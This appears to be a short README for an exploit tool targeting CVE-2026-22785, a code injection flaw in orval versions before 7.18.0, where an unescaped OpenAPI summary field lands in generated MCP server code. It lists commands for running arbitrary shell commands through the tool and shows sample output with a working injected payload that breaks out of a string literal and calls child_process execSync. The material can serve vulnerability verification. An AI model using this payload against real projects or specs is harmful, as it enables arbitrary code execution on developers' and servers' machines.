
Exploit tool for CVE-2026-22785, a critical code injection in orval < 7.18.0. Provides shell command execution and file scanning to demonstrate the vulnerability and verify payload injection.
orval < 7.18.0 directly concatenates the summary field from the OpenAPI specification into the template when generating MCP server code, without escaping it, leading to code injection.
cd exploit
npm install
# Execute command (exploit)
python cve_tool.py shell <command>
# Example
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# Scan files
python cve_tool.py scan <file>
<command output>
[+] CVE-2026-22785: Payload injection successful
[+] Injection location: server.ts:31
server.ts generated code:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);